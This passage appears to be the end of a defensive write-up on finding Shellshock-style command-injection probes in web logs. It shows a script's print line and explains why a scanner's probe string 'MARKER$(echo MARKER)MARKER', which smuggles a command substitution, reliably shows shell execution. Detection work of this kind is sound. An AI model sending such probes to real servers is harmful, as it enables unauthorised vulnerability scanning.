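        print("%(host)s %(request)s  [%(field)s] -> %(command)s" % hit)
```

Two practical notes: the tripled-marker check is what makes the module's probe reliable, since a plain `echo MARKER` could be reflected by a CGI that merely prints its environment, while `MARKER$(echo MARKER)MARKER` only triples if the shell actually expanded the command substitution; and because the log only preserves Referer and User-Agent, a server-side rule (for example in a WAF) that inspects every request header is needed to catch payloads sent in arbitrary headers like the scanner's "VULN".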
